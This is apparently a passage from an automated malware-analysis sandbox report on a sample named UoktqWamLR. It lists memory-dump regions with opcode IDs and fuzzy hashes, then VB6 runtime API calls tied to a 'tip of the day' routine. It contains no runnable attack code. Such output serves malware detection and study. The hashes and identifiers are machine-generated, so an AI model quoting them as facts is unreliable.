                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ef41f23567e4e7422021a95af9bb6b13c8200b2295415d293bf1cf4d9d63b1a6
                  • Instruction ID: f977cb42e8e1526ea90fa57e9a565b5f201d77e4fc19c840de7b6c86aa411e99
                  • Opcode Fuzzy Hash: ef41f23567e4e7422021a95af9bb6b13c8200b2295415d293bf1cf4d9d63b1a6
                  • Instruction Fuzzy Hash: DD01A43661C106CBDB30BF14CC489A7B3A6FB73360F95406BD41547B14E22DEC81D6AA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0b399b04e11d1ff954b26d47aa0a54e719ae22316263aa56bc50ae1b8ddb9bc6
                  • Instruction ID: 33c833e40b49eb8191a81c155cc5b5b28581803743917eac288df2a77f91ef83
                  • Opcode Fuzzy Hash: 0b399b04e11d1ff954b26d47aa0a54e719ae22316263aa56bc50ae1b8ddb9bc6
                  • Instruction Fuzzy Hash: CFF0ED73A145749BC731DB59D480E6AB3F9EB846B0B254895E95DD7A01D330FD40CBA0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d54b76756eadcee7a6fad7dc33b36984986ef2d9f3116deeadd9cae6966f9a68
                  • Instruction ID: de31f8e75c8437cecb4fd1c57b7aab3bfb126175ae37faa0f44f246b263c4bf4
                  • Opcode Fuzzy Hash: d54b76756eadcee7a6fad7dc33b36984986ef2d9f3116deeadd9cae6966f9a68
                  • Instruction Fuzzy Hash: BDD0A725009381DFC2020A3045526F337A48B12310B0604C3948547023D65C8A82E676
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c955feba49885877c83e8555f9f1eee84c6068569c1590036d33d388819479bb
                  • Instruction ID: d5e2615bae4dde41bd0e0477b49a7ebe8057fcf0c86f1651a6ff121202083888
                  • Opcode Fuzzy Hash: c955feba49885877c83e8555f9f1eee84c6068569c1590036d33d388819479bb
                  • Instruction Fuzzy Hash: ABC02B3E0291848DCB068F1440533F43B655301340B600DC3D08387696C00C8143F03E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f575302f331e920188028b263f9dbd3d41a12492a289b4a17bab70fd6897d1af
                  • Instruction ID: e94d12df182d8059efb14aecdead26895e9d0f6b4007aac2283acea903214c66
                  • Opcode Fuzzy Hash: f575302f331e920188028b263f9dbd3d41a12492a289b4a17bab70fd6897d1af
                  • Instruction Fuzzy Hash: 66C08C26868880CDC70D8E1901523F427258700740B3404C3D06B0AA91E11C4A03E97F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 949dd67e458e63fd3b0e71167456eaf83973598c28d4fb1a1081de303d78bf23
                  • Instruction ID: a411c30f1a043a4f8659a25a9ccc74ef790e7153c93fc6b5e4b5b38ad92e9b98
                  • Opcode Fuzzy Hash: 949dd67e458e63fd3b0e71167456eaf83973598c28d4fb1a1081de303d78bf23
                  • Instruction Fuzzy Hash: 87C09B2656D594CED71A4B554112FBD376867015C0F541482D4C54DCA7C10C9546D596
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 00408d28294f16215a4cb47f84b6fc749005c545bafaa214ea233331ad25dcf0
                  • Instruction ID: 98b0e72c07e5a4e937493aded209f4e1316f55c924417a8b5189d73faecc5117
                  • Opcode Fuzzy Hash: 00408d28294f16215a4cb47f84b6fc749005c545bafaa214ea233331ad25dcf0
                  • Instruction Fuzzy Hash: BEB09B3A1655844DD716CF1441537F537555704540B540456D08287656C00C4547D56D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a346d76f7c58118d78dde139ad0323288b41d975eb3cacb1a9f01b0a4c225c2f
                  • Instruction ID: ace3d1d88f54ed43b8ef4b404b91d2feb29500aa8929eb2c2ffcb51d1c0cb161
                  • Opcode Fuzzy Hash: a346d76f7c58118d78dde139ad0323288b41d975eb3cacb1a9f01b0a4c225c2f
                  • Instruction Fuzzy Hash: 0DB0922A4A26944DDB12CB244213AA93B6993014C0FD40481D4814BB6BC0088686DA96
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 403b859c92bb87a22b3b23818d0f9761360f240456280570c354f149d4e95fe8
                  • Instruction ID: 6d8b77ee072ee247f30958288c4a888cb08176c89a0772219baa462f0e89e92b
                  • Opcode Fuzzy Hash: 403b859c92bb87a22b3b23818d0f9761360f240456280570c354f149d4e95fe8
                  • Instruction Fuzzy Hash: 48B09234342640CFC205CE29C180F1473E8BB04A90F0244D0B800CB662C228ED80DA10
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c43a5081fe5d2bb3cd1689569c8f68dab492a46559b42270ac0312c03ebc32d
                  • Instruction ID: 95dff2fb833417202495218693bf5b1a421dd4471ca0001524ddc04ad995461f
                  • Opcode Fuzzy Hash: 4c43a5081fe5d2bb3cd1689569c8f68dab492a46559b42270ac0312c03ebc32d
                  • Instruction Fuzzy Hash: 46B0123F0716C44DDB13CF3442137E93B6593004C0F5404C1D0C04B66BC00C8687D556
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3b625a31192cdba39f244c3a7b2c9e608bd2f6f541c8760a5abf4e0cc5e8cee3
                  • Instruction ID: 1b24b7927bf96a24aa06c7982f721f4bd44d18806ebfed4b0eb72b6ec204062f
                  • Opcode Fuzzy Hash: 3b625a31192cdba39f244c3a7b2c9e608bd2f6f541c8760a5abf4e0cc5e8cee3
                  • Instruction Fuzzy Hash: 4EB0923957A5C48DD72A8B1880A37EA3B2AA301A00B2005A7C4834B71AD5084443E56F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 09929421d99742cfa4a401d3ddfe35bd1712795acecd8ac35f43a2c4d427f48e
                  • Instruction ID: 75d8ee55a9432d655d400c20f764b696a43bdfdc0ccd3be24d65f6ea96f8add4
                  • Opcode Fuzzy Hash: 09929421d99742cfa4a401d3ddfe35bd1712795acecd8ac35f43a2c4d427f48e
                  • Instruction Fuzzy Hash: 0CB012241015C18EC9024F1041127A877A0D7019C0F0A00C494C04B513C11C8645A610
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7243410bf63ae74259ed75016768b055e95cc34dc1bb8327bc4ee2ac82c6c069
                  • Instruction ID: b716f337e223803d9bf9056da0dfa28dece22195c761cbac3913b183491e9135
                  • Opcode Fuzzy Hash: 7243410bf63ae74259ed75016768b055e95cc34dc1bb8327bc4ee2ac82c6c069
                  • Instruction Fuzzy Hash: FCC04C34216950CFC259DB10C5A4EA43336BB94644F6441BCC80A0F6425F376A47CA00
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5253fc64d418cf8d330c0c384c5060f749f367f649a558d998fe79eb65a007d0
                  • Instruction ID: 08941c060161a8336f4e7577b21a9328f68bf2f8b4f76229ee55399738ef1da0
                  • Opcode Fuzzy Hash: 5253fc64d418cf8d330c0c384c5060f749f367f649a558d998fe79eb65a007d0
                  • Instruction Fuzzy Hash: EEA0127058B840C1C549990940907B161B05300700F200057A00381440650C4503742F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a1005a243bdb32d9e7159bd4fa16919ed6e83318095ae153ebf3549350c2b027
                  • Instruction ID: c5e8bae2c6636b37d6280c499ae5851068675df5fbe86f63e46ff6bff1c81faf
                  • Opcode Fuzzy Hash: a1005a243bdb32d9e7159bd4fa16919ed6e83318095ae153ebf3549350c2b027
                  • Instruction Fuzzy Hash: F5B00235259960CFC29A8B06D195E70B3BDF711741F4514F5F48A8FD62D3299D01CA15
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a879f20721cad36ef649cb569320bbe7707a8430c50e85f3a32086f98484d676
                  • Instruction ID: f0ad6341153dc1e1b8a8c6db723bec97b03b72d468f4765e1742ad1b38160250
                  • Opcode Fuzzy Hash: a879f20721cad36ef649cb569320bbe7707a8430c50e85f3a32086f98484d676
                  • Instruction Fuzzy Hash: 0EA012341094C089C30F4B0440A16607BB05718700F050055D05F83601810855019414
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c88d3fc5a209bfe47f9c555be498774a5864771ea9329a91ed443ae34172d73a
                  • Instruction ID: cbf0370656bfccada4697519865069d22944f1549d8b014d27acf67daecb72b8
                  • Opcode Fuzzy Hash: c88d3fc5a209bfe47f9c555be498774a5864771ea9329a91ed443ae34172d73a
                  • Instruction Fuzzy Hash: 1CA022322088E0C2C28EC22880E03B232B0A30CB00F30003BB803C3880C23C2A03B03E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3c631e839c2816014f05a94e393ed350118c38a3b74f2b79a5bbf6c8b63331fa
                  • Instruction ID: a8212114be1fd65a49839b719b8db344ca35bf7fc217f0b8dba079a80d3ba1dc
                  • Opcode Fuzzy Hash: 3c631e839c2816014f05a94e393ed350118c38a3b74f2b79a5bbf6c8b63331fa
                  • Instruction Fuzzy Hash: 7DA022380028C08EC2038B208220B30BBF0A300AC0F0A00C0E8C08BA03C00CC200E820
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 11de9bd38a5c2926ded7b2d4b88b15b2b2fc0c9abcacdb480970c4d1b6ebedb8
                  • Instruction ID: 664596a35e724026edb28b2439cded2094121dbb8e0adb39b0c312cc4a57852d
                  • Opcode Fuzzy Hash: 11de9bd38a5c2926ded7b2d4b88b15b2b2fc0c9abcacdb480970c4d1b6ebedb8
                  • Instruction Fuzzy Hash: 5FB00235165551CFC255CB45C195F6073B8F714741F4515F1E8054BD53C3349940C951
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 461c3e1164e184370a7fcaee4ad91e2c64327133319292e0d543075a40d27e2d
                  • Instruction ID: 571efbef654c22d07f7782f56988374ad57835122d54682a6cf50c7556e81d05
                  • Opcode Fuzzy Hash: 461c3e1164e184370a7fcaee4ad91e2c64327133319292e0d543075a40d27e2d
                  • Instruction Fuzzy Hash: 70B00275165951CFC2958B0AC554E5073B8B704645F4614E0E5055B952C324A904C904
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f5cb656c6f0c5c528d94e3245842e582c1717cd52d518e0f02656187cbb65317
                  • Instruction ID: 6effef86f93bcea52c59c6e313db030135291f14c5b0fecf0cfedf98451bea60
                  • Opcode Fuzzy Hash: f5cb656c6f0c5c528d94e3245842e582c1717cd52d518e0f02656187cbb65317
                  • Instruction Fuzzy Hash: 67B01230119CC0CFC241CB05C140F2073B9F704B02F0208F0F4064BD12C3789800C900
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 608ff2f7adf9c6d4681ed07a86add390bd22471e77fa6dba97efdd11c7e6e019
                  • Instruction ID: 083163092989c00f7b726e6d1c5b96e5fd6e20435485beb51bdb850849a0b3f5
                  • Opcode Fuzzy Hash: 608ff2f7adf9c6d4681ed07a86add390bd22471e77fa6dba97efdd11c7e6e019
                  • Instruction Fuzzy Hash: 4BB002351666D0CFC256DB05C155F7173B8F704645F4514F1E4054BD52D3789900C905
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 638c6b87f5638a12406e32795b89245882b412fe6ffbb3e06710fc7a8eb16105
                  • Instruction ID: f812c086ebbe3fcee4e0c7ab7b31365154552bb7b5a5c84c3c8411a302123d88
                  • Opcode Fuzzy Hash: 638c6b87f5638a12406e32795b89245882b412fe6ffbb3e06710fc7a8eb16105
                  • Instruction Fuzzy Hash: 99B00135266980CFC296CB0AC194F5073F8FB04A41F4655F1E4459BAA2CB38A940CB40
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 81da5efbcad4fce89d47f1bf7bd95df121564874bc0b044fa2fc0c958405c429
                  • Instruction ID: 11dbdfb89cf45435a296228df594b4a083c8197b63b8ca7482326550d8ea7202
                  • Opcode Fuzzy Hash: 81da5efbcad4fce89d47f1bf7bd95df121564874bc0b044fa2fc0c958405c429
                  • Instruction Fuzzy Hash: F3B00135266980CFC296CB0AC294F5073F8FB44A41F4A64F0E4458BA66C738AA00CA40
                  APIs
                  • __vbaNew2.MSVBVM60(0040C9C4,00503BA8), ref: 004FE9A5
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000014), ref: 004FE9C9
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040CC50,00000058), ref: 004FE9EC
                  • #689.MSVBVM60(?,Options,Show Tips at Startup), ref: 004FEA18
                  • __vbaStrMove.MSVBVM60(?,Options,Show Tips at Startup), ref: 004FEA22
                  • __vbaI4Str.MSVBVM60(00000000,?,Options,Show Tips at Startup), ref: 004FEA28
                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,Options,Show Tips at Startup), ref: 004FEA39
                  • __vbaFreeObj.MSVBVM60(?,Options,Show Tips at Startup), ref: 004FEA44
                  • __vbaNew2.MSVBVM60(0040C9C4,00503BA8,?,Options,Show Tips at Startup), ref: 004FEA61
                  • __vbaObjSetAddref.MSVBVM60(?,005023D0,?,Options,Show Tips at Startup), ref: 004FEA79
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000010), ref: 004FEA9C
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004FEAB4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040CCA4,000000E4), ref: 004FEAD8
                  • __vbaFreeObj.MSVBVM60(00000000,00000000,0040CCA4,000000E4), ref: 004FEAE0
                  • #594.MSVBVM60(?), ref: 004FEAF7
                  • __vbaFreeVar.MSVBVM60(?), ref: 004FEAFF
                  • __vbaNew2.MSVBVM60(0040C9C4,00503BA8,?), ref: 004FEB16
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000014), ref: 004FEB3A
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040CC50,00000050), ref: 004FEB5D
                  • __vbaStrCat.MSVBVM60(0040C440,?), ref: 004FEB6A
                  • __vbaStrMove.MSVBVM60(0040C440,?), ref: 004FEB74
                  • __vbaStrCat.MSVBVM60(TIPOFDAY.TXT,00000000,0040C440,?), ref: 004FEB80
                  • __vbaStrMove.MSVBVM60(TIPOFDAY.TXT,00000000,0040C440,?), ref: 004FEB8A
                  • __vbaHresultCheckObj.MSVBVM60(00000000,005023D0,0040CB70,000006F8), ref: 004FEBB0
                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004FEBD0
                  • __vbaFreeObj.MSVBVM60(?,?,?,00000000,005023D0,0040CB70,000006F8), ref: 004FEBDB
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004FEBF7
                  • __vbaStrCat.MSVBVM60(TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC07
                  • __vbaStrMove.MSVBVM60(TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC11
                  • __vbaStrCat.MSVBVM60( file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC1C
